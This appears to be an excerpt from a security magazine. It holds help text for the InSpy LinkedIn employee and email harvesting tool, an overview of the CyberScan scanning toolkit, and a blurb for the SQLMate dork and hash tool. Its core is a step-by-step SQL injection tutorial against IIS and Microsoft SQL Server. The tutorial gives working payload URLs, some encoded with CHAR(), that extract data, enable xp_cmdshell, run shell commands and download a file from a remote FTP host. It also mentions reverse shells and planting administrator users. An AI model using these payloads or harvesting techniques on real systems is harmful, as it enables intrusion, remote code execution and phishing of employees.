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InSpy

Introduction

InSpy is a python based LinkedIn enumeration tool. Inspy has two functionalities: TechSpy and EmpSpy.

● TechSpy - Crawls LinkedIn job listings for technologies used by the provided company. InSpy attempts to iden-

tify technologies by matching job descriptions to keywords from a new line delimited file.

● EmpSpy - Crawls LinkedIn for employees working at the provided company. InSpy searches for employees by 

title and/or departments from a new line delimited file. InSpy may also create emails for the identified employ-

ees if the user specifies an email format.

Installation

Run pip install -r requirements.txt within the cloned InSpy directory.

Help

InSpy - A LinkedIn enumeration tool by Jonathan Broche (@jonathanbroche)

positional arguments:

 company        Company name to use for tasks.

optional arguments:

 -h, --help      show this help message and exit

 -v, --version     show program's version number and exit

Technology Search:

 --techspy [file]   Crawl LinkedIn job listings for technologies used by

            the company. Technologies imported from a new line

                       delimited file. [Default: tech-list-small.txt]
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 --limit int      Limit the number of job listings to crawl. [Default:

            50]

Employee Harvesting:

 --empspy [file]    Discover employees by title and/or department. Titles

            and departments are imported from a new line delimited

            file. [Default: title-list-small.txt]

 --emailformat string Create email addresses for discovered employees using

            a known format. [Accepted Formats: first.last@xyz.com,

            last.first@xyz.com, first_last@xyz.com, last_first@xyz.com, 

            firstl@xyz.com, lfirst@xyz.com,

            flast@xyz.com, lastf@xyz.com, first@xyz.com,

            last@xyz.com]

Output Options:

 --html file      Print results in HTML file.

 --csv file      Print results in CSV format.

 --json file      Print results in JSON.
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Advanced SQL 
Injection - IIS & DBO 
- Scanner & Exploit

by Ivan Ricart Borges
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Explanatory Note

This article does not attempt to explain a new technique of compromising computer systems; the technique of SQL In-

jection is very old and known but at the same time can be very powerful. The article also does not reflect the exploit of 

an unknown vulnerability; this is known and has already been reported, which can reflect unpublished advanced 

mechanisms of SQL injection that can be used by malicious users to obtain critical information and take advantage of 

it to gain complete control of a computer system. 

Combining this technique with an IIS Web Server with elevated user permissions (DBO) in the Microsoft SQL Server 

database can lead to complete loss of control of the affected server.

This article will attempt to explain the potential risk caused by misconfiguration of an SQL database that interacts with 

an external web page through an IIS Web Server and give details of how malicious users can benefit from it.

Short Summary (Wikipedia)

SQL Injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL state-

ments are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection 

must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly fil-

tered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpect-

edly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL 

database.

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as 

voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or 

make it otherwise unavailable, and become administrators of the database server.

Vulnerability

Assuming that in the web page there are security problems with the passing of parameters to allow SQL Injection, the 

main problem is that the IIS Web Server is able to display critical information to the user by using an invalid Transact-

SQL conversion function. Imagine the following URL where the id parameter allows injection.

https://www.victim.com/index.aspx?id=1

A malicious user could override the value of the id parameter by the Transact-SQL convert function

convert(int, (SELECT+USER));--

The final URL would be of this style:

https://www.victim.com/index.aspx?id=convert(int, (SELECT+USER));--
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Analyzing the value of the id parameter we can say:

convert( ); Transact-SQL Conversion function

SELECT+USER SQL Query Get the current database user

+ Sign
In a URL indicates the 

hexadecimal character %20 
(space)

-- Sign SQL comments to inhibit the 
following instructions

The conversion function tries to convert a string to integer, which causes an exception where the IIS Web Server 

makes a serious error showing the value of the executed query.

A typical output would be something like this:

Conversion failed when converting the nvarchar value '{user}' to data type int. 

As we can see, the {user} value corresponds to the current value of the user of the database, in addition to all of this, if 

the value returned is dbo will tell us that the database user has maximum execution privileges, so that will be able to 

execute shell commands using the xp_cmdshell Transact-SQL function. 

Using a web page with a database user with maximum privileges is a serious security error where system administra-

tors should not fall. 

In summary, one could say that vulnerability consists of three factors: 

1. Error in handling the GET/POST parameters that allow SQL Injection. (Software Developer)

2. IIS Web Server that displays the conversion function information. (Microsoft)

3. Use a database user in the web page with maximum privileges. (System Administrator/Software Developer)

Points to consider 

The execution of the SQL statements are made on the machine where the Microsoft SQL Server is installed and may 

not be the same server where the IIS Web Server is installed.
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Get a numeric value

As we have seen, the vulnerability is to use the Transact-SQL convert function, but if we want to get a numeric value 

the conversion function will be correct and, therefore, the IIS Web Server will not display the error.

To solve this problem, we can concatenate the numeric value returned by the query with a string and then carry out 

the conversion process; in this way we will force the conversion function to fail.

The sign to concatenate strings in Microsoft SQL Server is +. Imagine the following URL where the id parameter al-

lows injection.

https://www.victim.com/index.aspx?id=convert(int,'num rows: '+convert(nvarchar,(SELECT 

COUNT(*) FROM table)));--

In this example, the IIS Web Server will display the number of rows in the table through the string num rows: {x}.

But there is a small error in the previous example, the + sign will conflict with the interpretation of the space, therefore 

we must escape it by the hexadecimal notation %2B.

The final URL would be of this style:

https://www.victim.com/index.aspx?id=convert(int,'num rows: '%2Bconvert(nvarchar,(SE-

LECT COUNT(*) FROM table)));--
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Errors with strings

According to the typology of the codification of the SQL statement in the webpage, the character of simple quote can 

cause syntax errors; because of this, we can escape the sentences by using the function Transact-SQL char, which will 

return the ASCII character according to the number passed as a parameter.

Imagine that we want to escape the string 'num rows: ', the result value would be:

CHAR(110)+CHAR(117)+CHAR(109)+CHAR(32)+CHAR(114)+CHAR(111)+CHAR(119)+CHAR(115)+

CHAR(58)+CHAR(32)

To translate the URL of the previous point we can use a SELECT subquery and escape the + sign with the hexadecimal 

notation %2B.

h t t p s : / / w w w . v i c t i m . c o m / i n d e x . a s p x ? i d = c o n v e r t ( i n t , ( S E L E C T 

CHAR(110)%2BCHAR(117)%2BCHAR(109)%2BCHAR(32)%2BCHAR(114)%2BCHAR(111)%2BCHAR(119)%2BCHAR

(115)%2BCHAR(58)%2BCHAR(32))%2Bconvert(nvarchar,(SELECT COUNT(*) FROM table)));--

Check status xp_cmdshell

To check if the dbo user has permissions to execute the Transact-SQL function, xp_cmdshell can run these SQL que-

ries:

1. SELECT value FROM master.sys.configurations WHERE name = 'show advanced options'

2. SELECT value FROM master.sys.configurations WHERE name = 'xp_cmdshell'

In both cases, the answer must be 1, otherwise, the attacker should pre-activate these modules in order to execute com-

mands in the shell.

Using the previous methods to display numerical values, the queries would look like this:

https://www.victim.com/index.aspx?id=convert(int,'show advanced options: '+convert(nvar-

char,(SELECT value FROM master.sys.configurations WHERE name = 'show advanced op-

tions')));--

https://www.victim.com/index.aspx?id=convert(int,'xp_cmdshell: '+convert(nvarchar,(SE-

LECT value FROM master.sys.configurations WHERE name = 'xp_cmdshell')));--

The escaped sentence with victim URL should be this way:
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h t t p s : / / w w w . v i c t i m . c o m / i n d e x . a s p x ? i d = c o n v e r t ( i n t , ( S E L E C T 

CHAR(115)%2BCHAR(104)%2BCHAR(111)%2BCHAR(119)%2BCHAR(32)%2BCHAR(97)%2BCHAR(100)%2BCHAR(

118)%2BCHAR(97)%2BCHAR(110)%2BCHAR(99)%2BCHAR(101)%2BCHAR(100)%2BCHAR(32)%2BCHAR(111)%2

BCHAR(112)%2BCHAR(116)%2BCHAR(105)%2BCHAR(111)%2BCHAR(110)%2BCHAR(115)%2BCHAR(58)%2BCHA

R(32))%2Bconvert(nvarchar,(SELECT value FROM master.sys.configurations WHERE name = (SE-

L E C T 

CHAR(115)%2BCHAR(104)%2BCHAR(111)%2BCHAR(119)%2BCHAR(32)%2BCHAR(97)%2BCHAR(100)%2BCHAR(

118)%2BCHAR(97)%2BCHAR(110)%2BCHAR(99)%2BCHAR(101)%2BCHAR(100)%2BCHAR(32)%2BCHAR(111)%2

BCHAR(112)%2BCHAR(116)%2BCHAR(105)%2BCHAR(111)%2BCHAR(110)%2BCHAR(115)))));--

h t t p s : / / w w w . v i c t i m . c o m / i n d e x . a s p x ? i d = c o n v e r t ( i n t , ( S E L E C T 

CHAR(120)%2BCHAR(112)%2BCHAR(95)%2BCHAR(99)%2BCHAR(109)%2BCHAR(100)%2BCHAR(115)%2BCHAR(

104)%2BCHAR(101)%2BCHAR(108)%2BCHAR(108)%2BCHAR(58)%2BCHAR(32))%2Bconvert(nvarchar,(SEL

E C T v a l u e F R O M m a s t e r . s y s . c o n f i g u r a t i o n s W H E R E n a m e = ( S E L E C T 

CHAR(120)%2BCHAR(112)%2BCHAR(95)%2BCHAR(99)%2BCHAR(109)%2BCHAR(100)%2BCHAR(115)%2BCHAR(

104)%2BCHAR(101)%2BCHAR(108)%2BCHAR(108)))));--

* These options are enabled by default in Microsoft SQL Server 2000.

Enable xp_cmdshell

If the previous statements return 0, the attacker could activate the modules using the following SQL statement:

EXEC master.dbo.sp_configure "show advanced options", 1; RECONFIGURE; EXEC 

master.dbo.sp_configure "xp_cmdshell", 1; RECONFIGURE;--

To execute these queries with the Transact-SQL EXEC function, we can concatenate the original value of the injectable 

parameter.

https://www.victim.com/index.aspx?id=1;EXEC master.dbo.sp_configure "show advanced op-

tions", 1; RECONFIGURE; EXEC master.dbo.sp_configure "xp_cmdshell", 1; RECONFIGURE;--

In this case, if the statements were executed correctly without any type of error, the IIS Web Server should display the 

original page.

Then the attacker could return to query the values through the queries seen in the previous section to check if the mod-

ules have been activated correctly.
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List files/directories

Once the xp_cmdshell module is activated an attacker can execute any type of shell command, with the only restric-

tion that they will not be able to see the results of your execution without using more complex techniques that will be 

detailed below.

Because the xp_cmdshell Transact-SQL function normally returns more than one row in a query, when the conversion 

process is performed using the Transact-SQL convert function, an error occurs indicating that multiple rows can not 

be converted, so the attacker has no way to visualize if what they are doing is performing correctly.

Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when 

the subquery is used as an expression.

An attacker could use a technique to filter the information and force the query to return a single line, for example, us-

ing the find command to filter the information, but it would be very cumbersome to do in each command. In addition, 

it may not filter correctly and the command may return multiple rows.

For example, in this case, it could get the location of the root system of the operating system.

set | find /I "SystemRoot"

The execution of the previous command could be done by:

https://www.victim.com/index.aspx?id=1;EXEC master.dbo.xp_cmdshell 'set | find /I "Sys-

temRoot"';--

But this way we could not see the corresponding output because the attacker would only be executing the command. In 

order to see the output, we should use a SELECT query.

To achieve that, the attacker could store the output information of the Transact-SQL xp_cmdshell function in a tempo-

rary table, through:

1. Creating a temporary table with a single row and column using FOR XML PATH

2. Create a temporary table with all the information of the query and an alphanumeric field

In both cases, write permissions are required in the database.

Although it would be much easier for the attacker to view the information through the first section because it is stored 

in a single row and column, and therefore the Transact-SQL conversion function would be direct, due to version com-

patibility issues and size of the data, it will be used in the second section, although this will cause as many subqueries 

as there are rows stored in the table.
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The main idea is to store the information of the shell command in a temporary table and later iteratively visualize the 

information by subqueries filtering by the autonumeric field, causing the failure in each of the subqueries using the 

Transact-SQL conversion function.

To carry out this process an attacker could follow these steps:

1. Run the query and store it in a temporary table

2. Query the number of rows in the temporary table

3. Perform subqueries by filtering through the autonumeric field, causing the conversion failure.

The first step could be done using the following SQL query:

DECLARE @cmd VARCHAR(8000); SET @cmd = 'dir c:\'; IF OBJECT_ID('tmp_xp_cmdshell', 'U') 

IS NOT NULL DROP TABLE tmp_xp_cmdshell; CREATE TABLE tmp_xp_cmdshell(field_pk int IDEN-

TITY(1,1), field_output VARCHAR(8000)); INSERT INTO tmp_xp_cmdshell(field_output) EXEC 

master.dbo.xp_cmdshell @cmd;--

In the previous statement, a cmd variable is declared separately to allow it to escape, both the declaration and the ini-

tialization are performed in two steps to maintain compatibility with all versions of Microsoft SQL Server, subse-

quently create a table with an autonumeric field and another with the output information, finally, it executes the com-

mand and it is stored in the table.

The escaped sentence with victim URL should be this way:

https://www.victim.com/index.aspx?id=1;DECLARE @cmd VARCHAR(8000); SET @cmd %3D (SELECT 

CHAR(100)%2BCHAR(105)%2BCHAR(114)%2BCHAR(32)%2BCHAR(99)%2BCHAR(58)%2BCHAR(92)); IF OB-

J E C T _ I D ( ( S E L E C T 

CHAR(116)%2BCHAR(109)%2BCHAR(112)%2BCHAR(95)%2BCHAR(120)%2BCHAR(112)%2BCHAR(95)%2BCHAR(

99)%2BCHAR(109)%2BCHAR(100)%2BCHAR(115)%2BCHAR(104)%2BCHAR(101)%2BCHAR(108)%2BCHAR(108)

), (SELECT CHAR(85))) IS NOT NULL DROP TABLE tmp_xp_cmdshell; CREATE TABLE 

tmp_xp_cmdshell(field_pk int IDENTITY(1,1), field_output VARCHAR(8000)); INSERT INTO 

tmp_xp_cmdshell(field_output) EXEC master.dbo.xp_cmdshell @cmd;-- 

The second step could be done using the following SQL query:

convert(int,'num rows: '+convert(nvarchar,(SELECT COUNT(*) FROM tmp_xp_cmdshell)));--

In this case, the number of rows of the temporary table is obtained, in this way it can be iterated in a recursive way by 

filtering by the autonumeric field.

The escaped sentence with victim URL should be this way:
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h t t p s : / / w w w . v i c t i m . c o m / i n d e x . a s p x ? i d = c o n v e r t ( i n t , ( S E L E C T 

CHAR(110)%2BCHAR(117)%2BCHAR(109)%2BCHAR(32)%2BCHAR(114)%2BCHAR(111)%2BCHAR(119)%2BCHAR

(115)%2BCHAR(58)%2BCHAR(32))%2Bconvert(nvarchar,(SELECT COUNT(*) FROM 

tmp_xp_cmdshell)));--

The last step could be done using the following SQL query:

convert(int,(SELECT field_output FROM tmp_xp_cmdshell WHERE field_pk = {1}));--

In this case, it should perform as many subqueries as the number obtained in the previous query, replacing the parame-

ter {1} with an incremental value of 1..n. Each of these subqueries will result in the corresponding line of the command 

executed using the Transact-SQL xp_cmdshell function. The escape statement with victim URL should be this way:

https://www.victim.com/index.aspx?id=convert(int,(SELECT field_output FROM 

tmp_xp_cmdshell WHERE field_pk = 1));--

https://www.victim.com/index.aspx?id=convert(int,(SELECT field_output FROM 

tmp_xp_cmdshell WHERE field_pk = 2));--

... 

https://www.victim.com/index.aspx?id=convert(int,(SELECT field_output FROM 

tmp_xp_cmdshell WHERE field_pk = n));--

Each of the previous statements would return an output similar to this: 

Conversion failed when converting the nvarchar value '2017/06/27 11:46  <DIR>     .' to 

data type int.

Conversion failed when converting the nvarchar value '2017/06/27 11:46  <DIR>     ..' 

to data type int.

...

Conversion failed when converting the nvarchar value '2017/06/27 11:46  <DIR>     WIN-

DOWS' to data type int.

Upload files

A malicious user could use these techniques to upload documents to the server. To achieve this, they should only exe-

cute commands in the shell so that the server will connect to a remote FTP server and download the desired document.
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Imagine the case that we want the server to connect to a remote FTP server called ftp.remote.com to download a file 

called file.exe with user ftp_user and password ftp_passwd.

The shell command to achieve this could be:

echo open ftp.remote.com 21 > ftp.tmp && echo ftp_user >> ftp.tmp && echo ftp_passwd >> 

ftp.tmp && echo user ftp_user ftp_passwd >> ftp.tmp && echo quote pasv >> ftp.tmp && 

echo binary >> ftp.tmp && echo get file.exe >> ftp.tmp && echo disconnect >> ftp.tmp && 

echo quit >> ftp.tmp && ftp -s:ftp.tmp && del ftp.tmp

The escaped sentence with victim url should be this way:

https://www.victim.com/index.aspx?id=1;DECLARE @cmd VARCHAR(8000); SET @cmd %3D (SELECT 

CHAR(101)%2BCHAR(99)%2BCHAR(104)%2BCHAR(111)%2BCHAR(32)%2BCHAR(111)%2BCHAR(112)%2BCHAR(

101)%2BCHAR(110)%2BCHAR(32)%2BCHAR(102)%2BCHAR(116)%2BCHAR(112)%2BCHAR(46)%2BCHAR(114)%

2BCHAR(101)%2BCHAR(109)%2BCHAR(111)%2BCHAR(116)%2BCHAR(101)%2BCHAR(46)%2BCHAR(99)%2BCHA

R(111)%2BCHAR(109)%2BCHAR(32)%2BCHAR(50)%2BCHAR(49)%2BCHAR(32)%2BCHAR(62)%2BCHAR(32)%2B

CHAR(102)%2BCHAR(116)%2BCHAR(112)%2BCHAR(46)%2BCHAR(116)%2BCHAR(109)%2BCHAR(112)%2BCHAR

(32)%2BCHAR(38)%2BCHAR(38)%2BCHAR(32)%2BCHAR(101)%2BCHAR(99)%2BCHAR(104)%2BCHAR(111)%2B

CHAR(32)%2BCHAR(102)%2BCHAR(116)%2BCHAR(112)%2BCHAR(95)%2BCHAR(117)%2BCHAR(115)%2BCHAR(

101)%2BCHAR(114)%2BCHAR(32)%2BCHAR(62)%2BCHAR(62)%2BCHAR(32)%2BCHAR(102)%2BCHAR(116)%2B

CHAR(112)%2BCHAR(46)%2BCHAR(116)%2BCHAR(109)%2BCHAR(112)%2BCHAR(32)%2BCHAR(38)%2BCHAR(3

8)%2BCHAR(32)%2BCHAR(101)%2BCHAR(99)%2BCHAR(104)%2BCHAR(111)%2BCHAR(32)%2BCHAR(102)%2BC

HAR(116)%2BCHAR(112)%2BCHAR(95)%2BCHAR(112)%2BCHAR(97)%2BCHAR(115)%2BCHAR(115)%2BCHAR(1

19)%2BCHAR(100)%2BCHAR(32)%2BCHAR(62)%2BCHAR(62)%2BCHAR(32)%2BCHAR(102)%2BCHAR(116)%2BC

HAR(112)%2BCHAR(46)%2BCHAR(116)%2BCHAR(109)%2BCHAR(112)%2BCHAR(32)%2BCHAR(38)%2BCHAR(38

)%2BCHAR(32)%2BCHAR(101)%2BCHAR(99)%2BCHAR(104)%2BCHAR(111)%2BCHAR(32)%2BCHAR(117)%2BCH

AR(115)%2BCHAR(101)%2BCHAR(114)%2BCHAR(32)%2BCHAR(102)%2BCHAR(116)%2BCHAR(112)%2BCHAR(9

5)%2BCHAR(117)%2BCHAR(115)%2BCHAR(101)%2BCHAR(114)%2BCHAR(32)%2BCHAR(102)%2BCHAR(116)%2

BCHAR(112)%2BCHAR(95)%2BCHAR(112)%2BCHAR(97)%2BCHAR(115)%2BCHAR(115)%2BCHAR(119)%2BCHAR

(100)%2BCHAR(32)%2BCHAR(62)%2BCHAR(62)%2BCHAR(32)%2BCHAR(102)%2BCHAR(116)%2BCHAR(112)%2

BCHAR(46)%2BCHAR(116)%2BCHAR(109)%2BCHAR(112)%2BCHAR(32)%2BCHAR(38)%2BCHAR(38)%2BCHAR(3

2)%2BCHAR(101)%2BCHAR(99)%2BCHAR(104)%2BCHAR(111)%2BCHAR(32)%2BCHAR(113)%2BCHAR(117)%2B

CHAR(111)%2BCHAR(116)%2BCHAR(101)%2BCHAR(32)%2BCHAR(112)%2BCHAR(97)%2BCHAR(115)%2BCHAR(

118)%2BCHAR(32)%2BCHAR(62)%2BCHAR(62)%2BCHAR(32)%2BCHAR(102)%2BCHAR(116)%2BCHAR(112)%2B

CHAR(46)%2BCHAR(116)%2BCHAR(109)%2BCHAR(112)%2BCHAR(32)%2BCHAR(38)%2BCHAR(38)%2BCHAR(32

)%2BCHAR(101)%2BCHAR(99)%2BCHAR(104)%2BCHAR(111)%2BCHAR(32)%2BCHAR(98)%2BCHAR(105)%2BCH

AR(110)%2BCHAR(97)%2BCHAR(114)%2BCHAR(121)%2BCHAR(32)%2BCHAR(62)%2BCHAR(62)%2BCHAR(32)%

2BCHAR(102)%2BCHAR(116)%2BCHAR(112)%2BCHAR(46)%2BCHAR(116)%2BCHAR(109)%2BCHAR(112)%2BCH
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AR(32)%2BCHAR(38)%2BCHAR(38)%2BCHAR(32)%2BCHAR(101)%2BCHAR(99)%2BCHAR(104)%2BCHAR(111)%

2BCHAR(32)%2BCHAR(103)%2BCHAR(101)%2BCHAR(116)%2BCHAR(32)%2BCHAR(102)%2BCHAR(105)%2BCHA

R(108)%2BCHAR(101)%2BCHAR(46)%2BCHAR(101)%2BCHAR(120)%2BCHAR(101)%2BCHAR(32)%2BCHAR(62)

%2BCHAR(62)%2BCHAR(32)%2BCHAR(102)%2BCHAR(116)%2BCHAR(112)%2BCHAR(46)%2BCHAR(116)%2BCHA

R(109)%2BCHAR(112)%2BCHAR(32)%2BCHAR(38)%2BCHAR(38)%2BCHAR(32)%2BCHAR(101)%2BCHAR(99)%2

BCHAR(104)%2BCHAR(111)%2BCHAR(32)%2BCHAR(100)%2BCHAR(105)%2BCHAR(115)%2BCHAR(99)%2BCHAR

(111)%2BCHAR(110)%2BCHAR(110)%2BCHAR(101)%2BCHAR(99)%2BCHAR(116)%2BCHAR(32)%2BCHAR(62)%

2BCHAR(62)%2BCHAR(32)%2BCHAR(102)%2BCHAR(116)%2BCHAR(112)%2BCHAR(46)%2BCHAR(116)%2BCHAR

(109)%2BCHAR(112)%2BCHAR(32)%2BCHAR(38)%2BCHAR(38)%2BCHAR(32)%2BCHAR(101)%2BCHAR(99)%2B

CHAR(104)%2BCHAR(111)%2BCHAR(32)%2BCHAR(113)%2BCHAR(117)%2BCHAR(105)%2BCHAR(116)%2BCHAR

(32)%2BCHAR(62)%2BCHAR(62)%2BCHAR(32)%2BCHAR(102)%2BCHAR(116)%2BCHAR(112)%2BCHAR(46)%2B

CHAR(116)%2BCHAR(109)%2BCHAR(112)%2BCHAR(32)%2BCHAR(38)%2BCHAR(38)%2BCHAR(32)%2BCHAR(10

2)%2BCHAR(116)%2BCHAR(112)%2BCHAR(32)%2BCHAR(45)%2BCHAR(115)%2BCHAR(58)%2BCHAR(102)%2BC

HAR(116)%2BCHAR(112)%2BCHAR(46)%2BCHAR(116)%2BCHAR(109)%2BCHAR(112)%2BCHAR(32)%2BCHAR(3

8)%2BCHAR(38)%2BCHAR(32)%2BCHAR(100)%2BCHAR(101)%2BCHAR(108)%2BCHAR(32)%2BCHAR(102)%2BC

HAR(116)%2BCHAR(112)%2BCHAR(46)%2BCHAR(116)%2BCHAR(109)%2BCHAR(112)); IF OBJECT_ID((SE-

L E C T 

CHAR(116)%2BCHAR(109)%2BCHAR(112)%2BCHAR(95)%2BCHAR(120)%2BCHAR(112)%2BCHAR(95)%2BCHAR(

99)%2BCHAR(109)%2BCHAR(100)%2BCHAR(115)%2BCHAR(104)%2BCHAR(101)%2BCHAR(108)%2BCHAR(108)

), (SELECT CHAR(85))) IS NOT NULL DROP TABLE tmp_xp_cmdshell; CREATE TABLE 

tmp_xp_cmdshell(field_pk int IDENTITY(1,1), field_output VARCHAR(8000)); INSERT INTO 

tmp_xp_cmdshell(field_output) EXEC master.dbo.xp_cmdshell @cmd;--

As we have seen in the previous section, the attacker could list the current directory to see that the document has been 

downloaded correctly.

Other shell commands

Once an attacker has control of a remote shell, they can make any type of configuration on the system, similarly they 

could create system users, add them to the administrator group, activate the terminal server service, get a more com-

fortable remote shell through the netcat program using a reverse shell connection ...

Seems like a lie but an attacker could even create a small executable program to redirect visible ports from the outside 

to internal ports (overlapping on top of a service), thus skipping possible firewall rules and obtain, for example, a re-

mote desktop.

Scanner & Exploit program
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To carry out the relevant tests, I have developed a program implementing the techniques described above, plus some 

others that I have not described, and so I can get my own conclusions.
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CyberScan: Hackers’ Favourite ToolKit *

Although it might seem that there are tons of similar tools, most of them serve a particular need, or offer complex tech-

nical features for a cybersecurity measurement requirement. In this article, we present Cyberscan, an easy to use tool 

that ensures together features of tools such as Nmap, Zenmap, Wireshark, etc. But, CyberScan is very simple and com-

pact. It is an open source toolkit for pentesting and ethical hacking.

For instance, CyberScan port scanner prevents intrusions by showing you the status of your network exposure by scan-

ning the network to monitor open services and ports that can be exploited by exogenous traffic. Furthermore, it pro-

vides basic views of how the network is lead out in order to help identifying unauthorised hosts or applications and net-

work host configuration errors that can cause serious security vulnerabilities. 

Moreover, CyberScan Tool Kit is able to send and capture packets of several protocols, forging and decoding them to 

be used for most network tasks such as scanning, testing connectivity through probing and attacks (Attacker ROI, 

DDOS Attack, SYN Flood, etc.)

In addition, it has some features like geolocation and deep packet inspection.

Figure 1: Sample usage of CyberScan

* This Workshop Is For Educational Purpose only, I am not responsible 

for your actions.
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As shown in Figure 1, Cyberscan is part of BlackArch OS Tools. It is developed by BEN ALI Mohamed from ESPRIT 

School of Engineering, Tunisia. Written in Python language, it requires at least version 2.7 of Python.

It is noteworthy that Python is available by default installed in Mac OS, BlackArch, and derivatives.

In the following paragraphs, we detail features of our toolkit.

1. Supported Operating Systems 

CyberScan works on different operating systems. Those we have tested are: 

• Windows XP/7/8/8.1/10

• GNU/Linux

• MacOSX

2. Installation

One can download CyberScan from https://github.com/medbenali/CyberScan /archive/master.zip or by using the fol-

lowing commands: 

git clone https://github.com/medbenali/CyberScan.git

cd CyberScan

python CyberScan.py -v 

CyberScan works out of the box with Python version 2.6.x and 2.7.x . One interesting note is that there is no need to 

install extra tools or libraries.
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3. The CyberScan Module Usage 

In order to make sure you have CyberScan in your machine, you can launch the same command as shown in Figure 2.

Figure 2: Checking CyberScan version and its help

This figure shows how to verify the available version of CyberScan. It also demonstrates how to list available op-

tions through its help manual.

In the following subsections, we describe briefly features offered by our tool. 

3.1. Test Network Connectivity 

One can perform ping active probe using several protocol’s measurement (ICMP, TCP, UDP, ARP, etc.).

a. LAN Hosts Discovery

The fastest way to discover hosts of a local Ethernet network is to use ARP. CyberScan uses ARP broadcasts used by 

hosts to resolve IP addresses in discovering connected machines and corresponds between couples of IP and MAC ad-

dresses.
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Figure 3 illustrates this use case of CyberScan. 

Figure 3: CyberScan ARP Host Discovery

b. ICMP Ping

In this case, one knows the network address or domain name of the host, it can test its connectivity thanks to an ICMP 

base of ping.
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Figure 4: CyberScan ICMP Ping

Figure 4 highlights usage of our ICMP ping functionality.

c. TCP & UDP Ping

As it is known, some hosts and routers block ICMP echo reply requests on their interfaces for security reasons: 

Another alternative is to use TCP active probing approach. As depicted in Figure 5, as TCP and UDP segments do not 

necessarily obtain the same processing at intermediate routers due to traffic engineering configurations, one can imag-

ine also using UDP active probing to measure Round-Trip time (RTT) encountered when using real-time applications. 

CyberScan, as shown in Figure 6, allows using a UDP ping to specific destination. 
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Figure 5: CyberScan TCP Ping
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Figure 6: CyberScan UDP Ping

3.2. Network Scanning

Another interesting tool of CyberScan is network scanning because it can be considered as being an entry point to a ma-

chine, or computer (box) that is connected to the internet.

a. Port Scanner

Port Scanning is one of the initial steps that a Penetration Tester (Ethical Hacker) will take to determine how secure a 

network or web application is from black hat hacker attacks.
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Figure 7: CyberScan Port Scanner

Figure 7 shows a sample usage of the port scanning feature of our tool.

b. IP GeoLocation 

CyberScan can find the physical location of an IP address. It helps, for example, an forensic investigator tracking down 

a suspect who wrote a threatening email or hacked someone's company.
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Figure 8: CyberScan Geolocation

One can verify the results of CyberScan tool, comparing them to those given by the website geolocaliser-ip.com. 

As shown in figure 8 and figure 9, both of them give the same result when testing a Google DNS whose address is 

8.8.8.8.
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Figure 9: Testing VS CyberScan Geolocation Result 
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3.3. Analyzing packet headers

The basic unit of network communication is the packet. CyberScan analyzes packets at different layers by the layers 

(IP, TCP, ICMP, UDP, etc.) and then corresponding to datagrams of each layers.

It corresponds to the third layer of the OSI model.

a. Ethernet Headers

One use of CyberScan (see Figure 10) could show header fields such as Mac address and EtherType.

Figure 10: Getting CyberScan Ethernet Headers

b. IP Headers

An IP Header is header information at the beginning of an IP packet that contains information about IP version, 

source and destination IP address, time-to-live, etc.

This is layer 3 protocol in the OSI model.
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Figure 11: Getting CyberScan IP Headers

c. TCP & UDP Headers

TCP provides reliable, ordered and error-checked delivery of stream of octets between applications running on hosts 

communicating by an IP Network or major applications such as World Wide Web (WWW), email, remote administra-

tion and file transfer rely on TCP.

Applications that do not require reliable data stream service may use UDP, which provides a connectionless datagram 

service that emphasizes reduced latency over reliability.
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Figure 12: CyberScan TCP Headers

Figure 13: CyberScan UDP Headers

Figures 12 and 13 illustrate usage of CyberScan to respectively decorticate TCP and UDP fields of a received IP packet.
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Conclusion 

CyberScan is a open pentest tool. It can be used to analyse and decode packets and help to scan ports. It can also ping 

and track locations using IP Address.

If anyone is interested in this work, please take a look at my GitHub Account (https://www.github.com/medbenali) as 

we have at least some public projects posted there.

If you have any needs or even just want to brainstorm, please feel free to connect.

Email: mohamed.benali@esprit.tn

Github: https://www.github.com/medbenali 

Facebook: https://www.facebook.com/hammouda.benali 

Twitter: @007Hamoud 

Instagram: benalimed007
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Videos:

1. Penetration Testing: https://www.youtube.com/watch?v=fyEKQ78HXho 

2. Kali Linux Tutorials: https://www.youtube.com/watch?v=CX4tRaMEiVo 

3. ROOT Tutorials: https://www.youtube.com/watch?v=3Ns6sxzv9rY

4. TECH Anonymous Expect us!:  https://www.youtube.com/watch?v=0cD_gu-OPBc

5. SSTec Tutorials: https://www.youtube.com/watch?v=XmC8bC0y8Zo

6. Techno Ash: https://www.youtube.com/watch?v=NCtsfvCprRo 

7. Haxer Hacker: https://www.youtube.com/watch?v=4Bv30URGN08

8. DeadCry: https://www.youtube.com/watch?v=TjKgKDdwrwM

9. PraTech Tutorials: https://www.youtube.com/watch?v=nIJkDExcBlQ

10. Tech Z india: https://www.youtube.com/watch?v=wU6xmib5c1U

11. Penetration Test Wireless: https://www.youtube.com/watch?v=Rq_GnC4BmMQ

12. Technical Solver: https://www.youtube.com/watch?v=q0_g8dhmRgY

13. RootTech: https://www.youtube.com/watch?v=hbxQhm18Cic 

14. Cybertron Tutorial: https://www.youtube.com/watch?v=NePSEA_CnJc 

15. The Shadow Brokers: https://www.youtube.com/watch?v=bNtfHc6RgXk 

16. T4P4N: https://www.youtube.com/watch?v=dOAfo7daL4U

17. Ethical Shaheen: https://www.youtube.com/watch?v=DXewWonnJNg https://

www.youtube.com/watch?v=UEegKzsTpEk

18. CITech Tutorials: https://www.youtube.com/watch?v=55bwulEOaNM

19. Helping Zone: https://www.youtube.com/watch?v=0RfSZbDw0HM

20. TECH & MASTI: https://www.youtube.com/watch?v=t5TGyqXWhRs

21. Offensive Security: https://www.youtube.com/watch?v=J5C66jhADsQ

22. Kang Hacking: https://www.youtube.com/watch?v=yG75NvPyakM 

23. Nhut Truong Security: https://www.youtube.com/watch?v=vOTrlEscyKI
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Hi there! 

SQLMap is the best database exploitation tool so far and SQLMate just makes it better. SQLMate is a program written 

in Python that can lookup hashes using various online services, can find admin panels, can find SQL injection vulner-

able websites with dorks and it can also dump fresh dorks.  

 

Usages  
Hashes can be cracked with a program like hashcat, but that requires a lot of resources, but there are several online 

services that allow you to do hash lookups. SQLMate uses the second approach and it merely takes three seconds to 

"crack" a hash. 

